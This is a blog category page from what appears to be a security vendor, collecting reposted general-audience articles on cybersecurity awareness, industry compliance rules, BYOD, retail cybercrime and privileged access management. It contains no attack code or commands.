Category: All

Cybersecurity: Awareness is slechts de eerste stap

European Cyber Security Month (ESCM) is an annual campaign designed to raise awareness of the myriad of threats individuals and organisations face in today’s ever more connected world

Whether it be malicious hacking, malware, espionage or data loss, we are more at risk of becoming victims of cybercrime than ever before. This trend is only set to increase exponentially into the future. 

The end goal of ESCM is not only to raise awareness of cybersecurity issues, but to also promote best practice, provide access to the resources required to fight cybercrime and, of course, to educate users and decision-makers about the risks they face.

While bringing awareness to an issue is important, one month of highlighting cyber security issues just isn’t enough. Hackers operate 24 hours a day, 365 days a year and it would be foolhardy not to ensure your cybersecurity protocols operate to the same timeframe.

The ever-growing threat

When national security, personal safety and business continuity is at stake, everyone should not only be aware of the threat, they should be taking actionSociety believes in this when it comes to environmental and physical threats so why are we so disengaged when it comes to cyber security?

Cyber security doesn’t just affect a person, but everyone around them. And in the globally connected world we live in, that literally is everyone. Infected devices have a way of infecting other devices, and compromised systems can make everyone vulnerable. So cyber security isn’t just about protecting you – it’s about protecting all of us.

The National Cyber Security Centre recently revealed that it has handled 658 attacks on 900 organisations, including schools, airports and emergency services, and said the attacks pose ‘strategic national security threats to the UK’. The spread of cyber-attacks should come as no surprise. The number of internet-enabled devices is skyrocketing. Already, there are seven billion internet-connected devices globally, and that number will more than triple to over 21 billion by 2025, IoT Analytics predicts. Thanks to the Internet of Things there is now web-enabled software in everything from planes to fridge-freezers. In an era where espresso machines have IP addresses and speakers are connected to the internet, a lot of effort is required to keep safe.

The threat is very real, and very immediate. And where the attacks are coming from a cause for serious concern.

Increased sophistication

Gone are the days where the only concern was the lone attacker wearing a hoodie in his bedroom. While that stereotype might have been true over 20 years ago, organised criminal gangs quickly got in on the action, stealing credit card details and testing the IT structures of retail banks to their very limits. More recently, ‘hacktivists’ like Wikileaks have tried to expose the malpractices and secrets of big businesses and powerful governments. And in the last few years, the advent of state-sponsored attacks have been ever increasing, with accusations of foreign meddling in domestic elections (US, France, Brexit) a massive concern. The transition from the teenager’s bedroom to the upper echelons of power has been frighteningly quick.

It is imperative that we move from a state of apathy to a state of national readiness when it comes to cyber threats. Cyber-attacks are getting more sophisticated, and are having real life consequences for nations, organisations and citizens. The fightback must begin.

The steps we must all take


Businesses need to own their IT. “Owning” your digital profile means taking stock of the apps, appliances and other IoT devices that hold and use personal and corporate data on a daily basis. Solutions which use things like data encryption provide visibility into and security for complex, interconnected IoT systems. They also help ensure devices are authenticated and data/control information is free from tampering.

Only after building a complete picture of your personal and organisational cyber landscape can you begin securing it.  95 per cent of successful attacks on enterprise networks result from spear phishing scams. Identifying a phishing attempt is the first step: always check the actual email and web addresses when you receive an email of which you are unsure. On a technological level, the use of multi-factor authentication and dynamic security policies can mitigate even successful phishing attacks.

The most important thing to remember about cybercriminals is that more often than not they rely on human error to gain access to systems. Continued employee awareness training can help strengthen cybersecurity defences by lowering the risks associated with human error.

Businesses can also make sure strong security processes are in place, including ensuring employees use strong passwords, and that they are changed regularly. Yes, Password123456 – I’m looking at you. 

Keep your software updated to the latest version available because updates often include fixes for disclosed vulnerabilities. Also be wary of public WiFi, especially when connecting in new locations – hotels and other public spaces are common targets for cybercriminals due to their unsecured networks.

And this isn’t only for the grown ups’ table. Just as we teach our kids to lock up their bikes, parents and teachers need to remind children to protect their phones and other devices with passwords. And children need to know that some things in life need to be kept secret!

Stop. Think. Connect.

The organisations behind National Cyber Security Month remind people to Stop. Think. Connect:

STOP: Before you use the Internet, take time to understand the risks and learn how to spot potential problems.

THINK: Take a moment to be certain the path ahead is clear. Watch for warning signs and consider how your actions online could impact your safety, or your family’s.

CONNECT: Enjoy the Internet with greater confidence, knowing you’ve taken the right steps to safeguard yourself and your computer (and other devices). 

In a world where cybercrime is to be expected, it is high time we ensure security at all times, not just when awareness is at a peak.


Campbell Murray is Global Head at BlackBerry. Today’s BlackBerry is a software company with a standard of security for managing the network of mobile and wearable devices, desktops and laptops, and other endpoints within enterprises. In addition to developing and providing applications, our BlackBerry Secure platform enables enterprises and independent developers to create applications for smartphones, medical devices, connected cars, consumer appliances and industrial machinery, and much more.

Original post is from Technative


COMPLIANCE ACROSS INDUSTRY: CYBERSECURITY COMPLIANCE REQUIREMENTS BY INDUSTRY SERIES

In the previous six articles, we’ve looked at how cyber security is impacting different industry sectors. The sectors analyzed have been, healthcare, financial services, manufacturing, automotive, energy, and retail. Each sector has its own cyber security pain points, and there is, of course, much overlap as well. Phishing is especially an issue across all industry sectors, likely because it taps into our behavior, and because of that it is very successful as an attack vector. To attempt to counter the onslaught of cyber threats against our nation’s industries, each sector has in place measures of compliance and regulations, with elements of security and privacy requirements specifically dealt with. In this final, round-up article, we’ll be looking at the compliance expectations of each sector, and how those guidelines should fit in with any industry sector security strategy.

Healthcare Compliance and Regulations

Healthcare is a data-rich industry sector and as such has some extensive security regulations to adhere to. The main body of regulations used within this sector are the Health Insurance Portability and Accountability Act (HIPPA) and the Health Information Technology for Economic and Clinical Health ACT (HITECH).

HIPPA was introduced in 1996 and the HIPPA Privacy Rule covers the security of Personal Health Information (PHI). PHI is has a very wide scope. It includes all personal information, such as name address and so on, but it also includes medical records and even DNA. HIPPA specifically regulates how PHI is handled, i.e. used and disclosed. It is meant, however, to get the balance between security and usability of PHI right; it is important to keep health data flowing and available for improved health care. The Privacy Rule covers health plans, healthcare providers, and health care clearing houses. Importantly, it also covers ‘business associates’. This means that the extended ecosystem of third-party vendors used by health care, also needs to be HIPPA compliant. Essentially any healthcare CIO is responsible for ensuring that third-party vendors take due care of any PHI that comes under their remit.

HITECH was introduced in 2009 as a way of encouraging the use of Electronic Health Records (EHR). HITECH is a separate law to HIPPA but they work in symbiosis. HITECH, for example, has set fines for non-compliance of HIPPA security regulations.

The HIPPA Omnibus rule, introduced in 2013, strengthens the main security requirements of HIPPA and sets the expectations of the breach notification rule to cover any breach of over 500 individuals. The breach must be reported to the U.S. Department of Health and Social Services, and the details made publically accessible.

Financial Services Compliance and Regulations

The financial services industry has a focus on the protection of financial data, including payment card information. Compliance requirements across the industry are complex and can be country specific. The Payment Card Industry Data Security Standards (PCI-DSS) specifically covers the handling and management of payment card data. This act covers all aspects of payment card data handling, from acquiring, transmitting, storing and processing these data. PCI-DSS is based on a process of, “access, report, remediate. It is about understanding your IT assets and processes around payment card handling, sorting out any vulnerabilities, and keeping records, as well as submitting compliance reports to the banks and card brands a company is associate with. Financial services companies need to ensure that their services can be PCI-DSS compliant.

The Sarbanes Oxley Act was brought in to protect the public from fraudulent financial transactions by corporations in general. However, it also impacts the financial sector. Its main thrust is around what records to store and for how long. The act specifies security measures that need to be undertaken to protect the stored records.

Payment protection is one area of compliance, but this doesn’t mean there isn’t a requirement to also protect Personally Identifying Information (PII) – see ISO27001 below.

Manufacturing Compliance and Regulations

There are a plethora of regulations covering the manufacturing industry, some being specific to the industry type, e.g. toy manufacture. However, in terms of security, the industry has to cover areas as diverse as data protection, IT safety and security, to health, safety and environmental impact. One of the most prevalent security based regulatory standards in this industry sector is the ISO27001 series. ISO/IEC 27001:2013 is a generic version of the regulation applied across all industry sectors. It is a regulation designed to establish an information security management system within an organization. The regulation looks at risks across the IT systems of a company, including how IT security is managed, access controls, operations security, and even human resource security. Meeting ISO/IEC 27001:2013 is an intensive process where the company must meet all of the requirements.

Automotive Compliance and Regulations

The automotive industry as a sub-sector of the manufacturing industry has to meet the compliance requirements of that industry. However, areas of automotive also offer financial packages for car purchases, and as such also need to meet various financial regulations, like PCI-DSS.

Transportation has to look to ISO27001 to ensure that customer and supplier information is kept safe, and to make sure their vendor ecosystem is also conforming to the remit of the standard.

The automotive industry has a specific requirement in terms of car safety too. As the automotive industry embraces the IoT and driverless cars, regulations covering those specifics will likely be covered by extensions to existing regulations.

Energy Compliance and Regulations

The North American Electric Reliability Council (NERC) controls the compliance requirements of the utility companies under the banner of energy. NERC specifically looks after the cyber security expectations of the sector, and more recently the impact of cybersecurity on the Smart Grid.

This sector is also covered by the Critical Infrastructure Protection (CIP) standard. Versions run from CIP-002 to CIP-009. A BES Cyber System is the term used in the sector to describe cyber assets that require protection. This includes control units such as SCADA and ICS.

Retail Compliance and Regulations

One of the main regulations overseeing security in the retail sector is PCI-DSS in controlling the handling and management of payment cards. PCI-DSS also covers Point of Sale (POS) transactions. This sector, as a major target for data theft, so is also under pressure to protect PII. Retail outlets build online stores requiring accounts to be created that store Personally Identifying Information, such as your name, address and email address. These data need to be protected using standards such as ISO27001.

Many of the standards and regulations have cross industry application. This makes sense in light of the cross industry attack vectors, many of which we have explored in each of the six industry sector articles looking at cyber security. Although some of the sectors have specific needs, such as the healthcare industry, all require a strategic approach to ensuring that the often complex compliance requirements can be met. It can take many months to get through the onerous requirements of compliance standards such as ISO27001, but the protection that a well thought through and regulated cyber security strategy can offer, is worth it in the long run, especially in light of the enormous efforts made by today’s cyber criminals.


When Digital Identity and Access Management Meets Physical Security

Where does digital security end and tangible, or physical, security begin? In today’s cybersecurity ecosystem, I’d argue that it’s all just security. In fact, if you are handling these domains in discrete silos, your cyber resilience is already taking a hit.

If your identity and access management (IAM) and physical security initiatives are not working as one, your organization may be suffering from unnecessary grief — and increasing risk.

When Physical and Digital Security Became One

Pinpointing exactly when these two previously discrete functions became one is up for discussion, and some may not even agree that they have become one at all. Regardless, it will be hard to envision them as discrete issues for much longer, particularly as the industry pushes the digital transformation envelope.

At the most basic level, IAM is a username/password credentialing system that gives one layer of authentication. Best practices say to have some second or multifactor authentication (MFA) procedure as part of the process. But this is a more basic question: Even if you’re using MFA, ask yourself, with today’s deceptions, has an identity truly been authenticated?

Not exactly, because in the scenario described, we are only authenticating credentials, not identity. Similar to physical identity and access management (PIAM), which unifies your physical and IT security systems, there is something called dynamic identity management, a next-gen solution gaining some support from major industry players that makes an effort to address the identity issue.

To best explain dynamic identity management, think of a mishmash of facial recognition, internet of things (IoT) sensors and monitors, and risk profiling. You walk into your workplace, a facial recognition system verifies your identity and, based on the risk profile assigned to you, you are allowed access to certain areas, both physical and digital, of the enterprise’s assets.

This certainly sounds like a combined solution that addresses both IAM issues and physical security challenges. From a security perspective, this approach looks fantastic.

But it’s also a brewing privacy nightmare.

Where Security Meets Privacy at the Workplace

Employers and employees generally expect some oversight and monitoring of behavior to occur in the workplace. But when the combination of identity and access management and physical security turns into a form of continuous monitoring that captures what time you get up from your desk and which bathroom in the office you’re using, it’s only a matter of time before privacy is violated.

Furthermore, if the security restrictions become too strict, you end up impacting workflow. Can you imagine what hospital operations would look like in the ER if a doctor or nurse were slowed down due to some IoT sensor failing?

With all the new technological innovations happening right now, it’s a short hop, skip and jump from robust security to behavior control in the workplace — something that, paradoxically, can kill the innovation of organizations. Building out your combined solution will always go back to your risk tolerance. The IBM Institute for Business Value (IBV)’s executive report, “Digital Transformation: Creating New Business Models Where Digital Meets Physical,” captures the essence of this security challenge: “The challenge for business is how fast and how far to go on the path to digital transformation.”

Put differently, before an enterprise makes a decision about which digital transformation path it will take, it should have a relatively good sense of what its security posture should look like post-transformation. Not defining the expected end state can create a huge blind spot that will not only impact security posture, but will also impact business operations as a whole. What’s more, you need to ensure your transformation is trusted by your users, otherwise you’re increasing the likelihood of legal challenges and ethical dilemmas coming toward your enterprise.

Don’t Be Afraid of Low Tech

For the reasons outlined above, there’s a case to be made for some more “archaic” solutions. These include sound human intelligence, situational awareness, and good old-fashioned holistic assessments and education campaigns. For all the gadgetry you integrate into your enterprise, at least in 2019, there is no replacing the gut instinct and human innovation. After all, it is human innovation — albeit sometimes with technical assistance — that circumvents security measures.

The “human touch” needs to be a critical part of identity and access management and physical security systems. The human is where these two issues meet, and trying to move all human security interaction to something more passive will ultimately raise your risk profile, not lower it.

Which is better positioned to see if something is amiss: an IoT sensor, or an employee who knows Johnny shouldn’t be in that part of the building? These are the small vulnerabilities we need to be sensitive to, because for all the wonder and benefit that things like artificial intelligence bring to cybersecurity, we still want to ensure that we are using this great technology as a tool and not a crutch.

Looking further into the future, as you consider which digital transformation strategy will best meet your security needs, remember that there is a technological wildcard waiting to play in the big leagues: quantum computing. Quantum computing has the capability to obliterate credentialing systems as we know them today. We’re not dealing with apples-to-oranges comparisons here — it’s more like apples to locomotives. When quantum computing takes hold, we will not be talking about digital transformation anymore, but instead, quantum transformation.

Key Digital Transformation Takeaways

Because there is so much going on in this space today, it’s worth summarizing some key takeaways.

First, identity and access management and physical security tasks need to be dealt with as one joint task, not two separate ones. Treating them as separate may be a sign that your teams are not aligned internally.

Second, next-gen identity and access management systems, such as those that integrate biometrics and IoT sensors, have incredible potential, but also come with intangible concerns, such as privacy issues. These issues need to be addressed concurrently as part of any digital transformation effort.

Third, before any digital transformation undertaking, make sure you know what the end state is supposed to look like. Not only might you be building more risk and fragility into your system than you bargained for, but new technologies on the horizon may completely alter the expected return on your investment.

Lastly, don’t overlook the human component when facing the digital/physical security challenge. Humans are the glue that connect these two realms — and a critical part of successful digital transformation.

Original post is from Security Intelligence


Businesses have never been more at risk of data breaches

A recent report by DLA Piper found that European companies suffered 60,000 data breaches in the 8 months following the GDPR laws coming into force, equating to one every 5 minutes. Ransomware attacks are also growing by more than 350% annually, while 70% of businesses felt that their security risk increased significantly as recently as 2017.

The reports certainly seem to be reflected in the media, with Microsoft, Facebook and even home improvement retailer B&Q reporting data breaches in recent months. Both Microsoft and Facebook suffered sophisticated hacks, yet B&Q’s records of store thieves were made public simply because the information was stored on open source search engine technology that had not been set up to require user-ID authentication.

This reflects an often overlooked truth about data breaches; although cyber attacks receive more attention in the press, it is more often human error or simple negligence that results in data breaches.

The Information Commissioner’s Office revealed in their yearly financial report for 2017/18 that 4 of the 5 leading causes of data breaches could be attributed to human error.

  1. Data sent by email to inc rep
  2. Data posted/faxed to inc rec
  3. Loss/theft of paperwork
  4. Failure to redact data

Human beings are inherently flawed, and the mistakes of an individual can jeopardise the entire business. Indeed, the notorious Equifax breach of 2017, which leaked the personal data of nearly 146 million Americans, was reportedly due to one employee repeatedly failing to implement software updates that would have prevented the breach.

Given the fact that a company’s employees can often be the weak link in its data security strategy, it is imperative that company directors understand which areas of the business are the most liable to cause a data breach.

1.    Remote Workers

One type of employee that risks putting the wider business at risk is the remote worker. Telecommuting is an increasingly common working arrangement whereby employees are occasionally permitted to work from home, which has led to around 70% of people globally working remotely at least one day a week.

However, remote work carries additional security risks. An employee working with a company laptop in a coffee shop might be using a Wifi network that is not secure, allowing even basic hackers to gain access to private company data. Additionally, few employees can avoid using paper files and these confidential documents can quickly become lost or stolen in public places.

Employers should therefore clearly outline their remote employees’ responsibilities regarding confidentiality and data protection. They must also establish device security policies that remove the scope for costly mistakes, such as by specifying that all file downloads should be work-related. Other advisable policies include implementing device monitoring, rigorous password protection and asking that devices and files are only used in specific locations with secure Wifi networks.

2.    Administration department

Another vulnerable area of any business is the administration department. Responsible for a business’ financial planning, record keeping and logistics, an administrator is often the backbone of an organisation. An administrator’s role is therefore crucial for avoiding a data breach, as if any of their responsibilities are performed incorrectly sensitive data could quickly be obtained by malicious third parties.

With so many documents moving through the admin department every day, sensitive information found on meeting notes, tax forms and financial reports can become lost or stolen if an effective process is not in place. A prerequisite should therefore be establishing a clean desk policy in the office, whereby all employees are required to declutter their workspaces at the end of each day.

By implementing this rule, administrators will find it far easier to store and destroy sensitive documents. Any data that is still used and found in hard copy should be locked in storage cabinets overnight, with the most important files being stored off-site at a secure information management facility. Furthermore, documents that are no longer needed should be shredded immediately rather than thrown in waste bins, where they can be found and potentially used as blackmail or for fraudulent purposes.

3.    Complacent managers

Complacency is perhaps the most common reason for a data breach, and higher-level managers who fail to promote data security best practices pose the greatest risk. Managers are responsible for setting the standard in cybersecurity, but if they become complacent in implementing security awareness programmes their employees may begin to also forget their training.

Poor password management, opening suspect emails and leaving computers unlocked are all practices that creep into a business’ culture if an example is not set at the top. Not only should managers regularly encourage their staff to change their passwords and lock their devices, but they should also arrange for external training to be made available for all staff.

For example, managers should invest in up-to-date e-learning training sessions for both online and offline security, as well as invite IT experts to teach employees about common hacking risks and how they should respond to a successful data breach.

Key Takeaways

The rising threat of cyber attacks is undeniable, and companies of all shapes and sizes should ensure preparations are made to deal with direct attacks. However, businesses cannot afford to neglect the cost of mistakes made by staff and any budget set aside for cybersecurity should include resources for comprehensive training and secure document storage and disposal. Only then can the risk of human error be minimised.

This post originates from technative.io.


Top Privileged Access Management Use Cases

Privileged Access is everywhere. Privileged accounts can be found in every networked device, database, application, and server on-premises and in the cloud. Privileged users have the “keys to the kingdom” and, in the case of a cyberattack or data breach, privileged credentials can be used to cause catastrophic damage to a business. Begin by securing these 6 critical areas with a Privileged Access Management solution. View this infographic to discover where to start.

Download “Top Privileged Access Management Use Cases” Infographic-Privileged-Access-Fundamentals.pdf – 27 keer gedownload – 1 MB


CYBERCRIME AND INDUSTRY #6: HOW CYBERCRIME IS AFFECTING THE RETAIL INDUSTRY

It is an arguable point, but the retail sector has probably changed more than any other industry area in the last 20 years. This is mostly down to the globalization of retail through online sales, but it also because of innovation in the area of marketing and consumer loyalty. For example, in 2106 so far, $300 million has been invested into retail technology start-ups. And we love to shop. In 2016, the expected online spend in retail will be $1.67 trillion and this figure just going to grow and grow through 2020 at least.

The issue that retail has as it expands its business by embracing the Internet as a sales platform, is the same as other industry sectors, it is opening itself to cyber criminals as well as shoppers.

Retail, like many other sectors, is feeling the pinch in terms of costs of cyber attacks. 

Some of the largest breaches to date have occurred in the retail sector including 145 million customer passwords stolen from eBay, 40 million payment cards and 70 million personal account details stolen from Target Corp, and a breach at Home Depot affecting 56 million customer payment cards.

What sorts of cyber crimes affect the retail sector?

According to the Verizon Data Breach Investigations Report 2016, retail saw the greatest cyber threats in the following three main areas:

●      Web app attacks: This is where a web application is targeted. Usually the vectors used are phishing of administration credentials, or exploiting software vulnerabilities then installing backdoor malware to slowly exfiltrate data. DDOS is also included in web app attacks.

●      Point of Sale (POS) attacks: These are remote attacks of POS services. Key logging malware seems to be the main vector of this attack. This type of cyber threat is being targeted against all size retailers because of the Internet enablement of POS assets.

●      Payment card skimmers: In this type of attack, the POS device has to be physically compromised. Often, organized gangs carry out this type of crime. It mainly affects bank ATM’s, but merchants are still at risk from this.

A particularly interesting finding by Verizon was that “97% of breaches featuring stolen credentials leveraged legitimate partner access”. This implies that retail has a major issue with securing the supply chain and managing the risk of third parties.

What are the specific pain points of retail?

The Retail Cyber Intelligence Sharing Center (R-CISC) has identified a number of areas that makes retail stand out in the cyber security risk mitigation stakes. These areas make retail a particular type of target for cybercriminals and include:

●      High turnover of staff. This means that insider threats are more likely.

●      Holding of payment card data which needs to be PCI compliant. This presents issues in dealing with third parties in the supply chain, who have also to be PCI compliant if they in any way manage financial data.

●      Customers are also potential threats. This may be unique in the retail industry where the customer has the potential to commit fraud.

●      Having a widely dispersed attack surface. Many retail outlets have a wide geographic reach in terms of outlets as well as having an online presence.

Retailers have other pressures too, that although not unique to this sector, are a focus of attention. For example, retailers have a number of peak seasons, such as Black Friday, Cyber Monday and Christmas which are known to be extremely busy times and so a target for fraud and sabotage. Cyber Monday 2105 saw the highest ever sales with $3.19 billion being spent in a single day. Cybercriminals have been targeting websites specifically to cause chaos on very busy days like Cyber Monday, using Distributed Denial of Service attacks (DDoS) which make websites and apps fall over. In 2014 the WordPress shopping cart, Cart66, used by large numbers of retailers to add shopping cart functionality to their site, had a massive DDOS attack. Akamai, have found that DDOS attacks have increased by around 22.5% between 2014-2015, with retail being the most popular attack focus for DDOS.

Can retail stop the tidal wave of cybercrime?

Retail analysts, eMarketer, have predicted that by 2017, over 51% of Americans will make at least one online purchase using a smartphone, accounting for over $75 billion in sales. As retail embraces online purchases, and mobile buying starts to become the normal purchase medium, we can expect to see more mobile-based threats emerge. But mobile threats are now becoming a well-known vector, and e-commerce has an opportunity to nip this one in the bud. One of the key areas that need to be dealt with to mitigate web based and ultimately app based security threats, is to harden the software behind the scenes. This means ensuring that mobile and web app development has to be done as a secure coding exercise, following the advice of the Open Web Application Security Project (OWASP). Many smaller retailers use third party apps such as WordPress and associated plug-ins to build their retail sites. Using third parties to build your retail site means that you have to be ultra vigilant, choosing security aware plugins and apps, and maintaining updates. One of the weak points of web and mobile app security is authentication. As mentioned earlier, 97% of breaches are from stolen passwords. It’s important that retail put the hardening of authentication as a priority, especially for administrator and privileged access via supply chain vendors. Putting security measures in place for known threats, using security intelligence from the likes of the National Institute of Standards and Technology (NIST), and R-CISC, will change the future retail threat landscape from one of major breaches, to a much more controlled environment, making it safe for all of us to shop online.


BYOD Adoption and Mobile Threats Increases, Can Enterprise Data Security Keep Up?

By Sue Poremba | 4 min read | Original post from Securityintelligence.com

While most security professionals have come to embrace — or, at least, accept — bring-your-own-device (BYOD) policies, leadership still often lacks confidence in the data security of employees’ personal phones, tablets, and laptops.

In a recent study from Bitglass, 30 percent of the 400 IT experts surveyed were hesitant to adopt BYOD due to security concerns such as data leakage, shadow IT and unauthorized data access. As the General Data Protection Regulation (GDPR) and other data privacy mandates go into full swing, it’s more important than ever for organizations to monitor and protect enterprise data on mobile devices. However, BYOD may still be the Wild West of network access, especially given the rapid proliferation of new endpoints.

All these moving parts beg the question: Is BYOD security any better today than it was when personal devices first entered the workforce?

Growing Acceptance of Personal Devices in the Enterprise

It wasn’t long ago that corporate leadership balked at the idea of their employees using personal devices for work. While workers had been using their personal computers and laptops to access company networks, it wasn’t until smartphones and digital tablets were introduced that the concept of BYOD caught on. Security for these devices wasn’t very mature back then, and IT and security decision-makers had well-founded concerns.

Over the past decade, of course, phones have evolved into personal hand-held computers. According to Comscore, only 17 percent of consumers were using smartphones in 2009, compared to 81 percent in 2016. That irreversible trend, along with the rise of the internet of things (IoT) and wearable devices, linked personal technology inextricably with enterprise networks.

Employees believe they are more productive and efficient when using not only their device of choice but also their preferred software and apps. Apparently, leadership agrees: The same Bitglass study found that 85 percent of companies now allow not only employees, but even contractors, customers and suppliers to access enterprise data from their personal devices. Despite this shift, more than half of those surveyed believe mobile threats have gotten worse.

Mobile Threats Are Rising, but Security Hasn’t Changed Much

Given the ubiquity and relative insecurity of mobile devices in the workplace, it’s no surprise that criminals are targeting them. Threat actors can gain access to both corporate data and personal data from one easy-to-breach device. Basic mobile security protections, such as remote wiping and mobile device management tools, are deployed in just over half of the organizations surveyed by Bitglass. In addition, many security teams lack visibility into apps used on personal devices.

Most threat actors who attack mobile devices are after passwords, according to mobile security expert Karen Scarfone, as quoted by Wired.

“A lot of email passwords still go back and forth in the clear,” she said. “That’s a big problem.”

Passwords remain the keys to the data castle, and they are largely unencrypted and unprotected on mobile devices. This, coupled with the password reuse epidemic, means that threat actors can gain virtually unlimited access to corporate networks through personal devices.

Clearly, there’s plenty of room for improvement when it comes to mobile security. A U.S. Department of Homeland Security (DHS) study mandated by the Cybersecurity Act of 2015 found that while the federal government’s use of mobile technology is improving, “many communication paths remain unprotected and leave the overall ecosystem vulnerable to attacks.”

Similar security holes exist in the private sector. According to SyncDog, mobile devices are the most dangerous point of intrusion to corporate networks. In large enterprises in particular, “mobile devices are looked at as toys with games on them, and protecting them comes last in line to application management, network security, mainframes and other larger IT concerns.”

While most security professionals have come to embrace — or, at least, accept — bring-your-own-device (BYOD) policies, leadership still often lacks confidence in the data security of employees’ personal phones, tablets, and laptops.

In a recent study from Bitglass, 30 percent of the 400 IT experts surveyed were hesitant to adopt BYOD due to security concerns such as data leakage, shadow IT and unauthorized data access. As the General Data Protection Regulation (GDPR) and other data privacy mandates go into full swing, it’s more important than ever for organizations to monitor and protect enterprise data on mobile devices. However, BYOD may still be the Wild West of network access, especially given the rapid proliferation of new endpoints.

All these moving parts beg the question: Is BYOD security any better today than it was when personal devices first entered the workforce?

BYOD Security Starts With Smart Policies

How can chief information security officers (CISOs) and IT leaders ensure that employees use their personal devices in a smart, secure way? First, determine whether the employee needs to use personal devices for work at all. If there are jobs within the organization that doesn’t require regular access to networks, or if employees are working remotely, these users should not be allowed to participate in a BYOD program because their devices are neither authorized nor consistently monitored.

Second, employees should be required — or, at least, highly encouraged — to update their device software, especially operating systems and any security software. Consider requiring all employees who use personal devices to install corporate security software and use the company’s security protocols if they are connecting to enterprise networks.

Third, communicate BYOD policies to employees and implement effective measures to enforce them. Policies should include the most basic data security best practices, such as implementing multifactor authentication (MFA), creating strong and unique passwords, using virtual private networks (VPNs) over public WiFi, and locking devices with biometric controls. In addition to protecting enterprise networks, these steps will help secure employees’ personal data on devices. But remember, a policy is useless if you don’t enforce it. People will break the rules if they know there are no consequences to pay.

When it comes to worker productivity, the embrace of BYOD has been a good thing for businesses. But in a world where cyberthreats loom large and data loss could result in huge fines and reputational damage, enterprises need to prioritize the security of their critical assets — and that of the thousands of endpoints that access them.

To learn more, read the IBM white paper, “The Ten Rules of Bring Your Own Device (BYOD).”


Busting Top Myths About Privileged Access Management

January 14, 2020 | Security and Risk | Sam Flaster | Read original article here

Today, businesses everywhere are investing in infrastructure to support growth – whether that’s moving to the cloud or automating tasks and processes.  However, the newly introduced devices, application stacks and accounts that come with this modernization all present additional opportunities for attacker exploitation. For any organization – big or small – identifying and addressing security risks across this expanding attack surface can be a formidable challenge.

Privileged access management (PAM) programs that secure pathways to critical business information are foundational to an effective corporate cybersecurity program. Why?  Attackers view privileged accounts as one of the best ways to gain a foothold within an organization’s infrastructure. In fact, the vast majority of cyber attacks involve compromised privileged credentials and PAM solutions provide a critical layer of defense.

But, while securing privileged access consistently tops the lists of projects that can reduce risk and improve operational efficiency, some misconceptions surrounding PAM persist. Today, we’re going to bust five of the most prevalent PAM myths.

Myth #1: Because privileged access exists everywhere, it is impossible to secure.

While the scope of privileged access can be intimidating based on the complexity of your environment, dedicated PAM solutions and related policies can actually shrink the attack surface by shutting down pathways to critical resources.

Leading PAM solutions can automatically map privileged credentials across cloud and hybrid environments, saving security teams significant time and effort. And for those unsure of where privileged accounts exists, there are free tools like CyberArk Discovery & Audit to help organizations gain visibility into their privileged account landscape.

Additionally, modern PAM tools also incorporate automatic rotation of SSH keys and other privileged credentials at regular intervals to eliminate the time-consuming and error-prone manual tasks required for regulatory compliance. Meanwhile, automatic session monitoring capabilities systematically record all privileged account sessions and identify which users are operating privileged accounts.

Finally, the best PAM tools also provide detailed session monitoring recordings that can be sorted into searchable metadata for compliance and incident response teams and leverage user behavior analytics to automatically detect and suspend risky privileged sessions.

The impossible just became achievable.  Between account mapping, automatic credential rotation and detailed session monitoring, privileged access can be uncovered, managed and secured.

Myth #2: Privileged access management tools are challenging for administrators to manage.

That may have been true in the past, but today’s PAM solutions greatly ease and simplify administrator workloads. Collecting all privileged accounts in a centralized vault eliminates the need to manually search for and manage privileged credentials. In increasingly dynamic network environments, centrally locating the necessary tools to appropriately manage users’ privileged access can improve the efficiency and efficacy of IT projects. Automation tools also enable administrators to eliminate time-intensive tasks in favor of more strategic initiatives.

Especially as organizations move to the cloud, PAM tools can be particularly useful to address emerging risks of cloud migration. When adopting a hybrid or public cloud infrastructure, even slight misconfigurations can create new vulnerabilities.  Having holistic tools in place to discover risks associated with privileged access can improve an organization’s security posture.

Myth #3: Identity and Access Management (IAM) solutions are sufficient to protect privileged access.

It’s true that IAM tools and Multi-Factor Authentication (MFA) methods are strategic investments – but they do not replace the value of a PAM solution.  PAM solutions can independently protect privileged accounts with human and non-human identities like application accounts used in robotic process automation (RPA) or DevOps – something IAM solutions simply aren’t designed to do.

Focused on risk reduction, PAM tools can also protect privileged business users from sophisticated social engineering attacks capable of bypassing MFA. Most importantly, IAM tools require direct connection to user databases like Active Directory (AD). These connections are often hosted on-premises. If any on-premises server is compromised, attackers can gain control over AD to implement Kerberos attacks, such as Golden Ticket, and exist undetected in a company’s network. PAM can provide a vital security layer for servers hosting IAM’s direct connection to user databases like AD.

To create a strong enterprise security fabric, IAM systems and PAM solutions should be deployed as collaborative tools.

Myth #4: Privileged Access Management solutions interfere with operational efficiency.

The truth is that the daily tasks of most workers don’t require elevated privileges – and therefore PAM solutions won’t impact them at all.  For those who do require elevated privileges, leading PAM tools offer a variety of user-friendly formats, including RDP, SSH and web-native access, to provide credential vaulting and session management in the background of their daily workflows. Native and transparent access provides organizations with comprehensive privileged session recordings while minimizing disruption for end users.

In fact, using PAM tools to automate time-consuming tasks for IT and security employees can improve productivity by freeing up time for higher-value projects. Audit teams can achieve the same benefits by automating compliance tasks — especially in highly regulated industries like healthcare en banking.  Manually sorting through all sessions that involve privileged credentials to find high-risk activity can be extremely time consuming. PAM solutions can automate these tasks and identify risky behavior for audit teams, freeing them up to spend their time on other critical tasks.

Modern PAM solutions can actually be a boon to operational efficiency – not an impairment.

Myth #5: It’s Difficult to Calculate ROI for Privileged Access Management solutions. 

The average cost of a data breach in 2019 came in at nearly $4 million dollars. Notably, this figure does not include the additional costs of lost business from reputation damage and theft of intellectual property. Privileged access is a focal point for organizations to demonstrate where security solutions can have a high impact.

In any security program, cost-efficiency is key. Organizations must take a risk-based approach, applying finite resources where they can achieve quick wins and long-lasting impact. And it’s in this area where PAM solutions can really shine. PAM is a high-leverage point where modest investments can achieve outsized ROI and risk reduction.

After deploying a PAM solution, organizations can scan their systems to see the decrease in the number of unsecured and unprotected systems. Since any unmanaged privileged account is a potential attack vector, each privileged account that has been discovered, secured and protected by a PAM solution is a direct reduction in the exposed attack surface and proof of ROI.

Effective security starts with protecting an organization’s most valuable information, and as a common target in most cyber attacks, unmanaged and unprotected privileged access represents a significant threat. By locking down privileged credentials, organizations deprive attackers of their preferred routes to critical data and assets. Simultaneously, session monitoring and threat detection capabilities can help teams detect and investigate misuse of privileged credentials — improving an organization’s response time to in-progress attacks.

Furthermore, many PAM solutions can PAM solutions can integrate with other enterprise software  solutions – from IoT device gateways  DevOps tools and network devices to vulnerability management systems – enhancing their value and streamlining security operations on the whole.

Want to learn more?  Read more about PAM and our solutions here


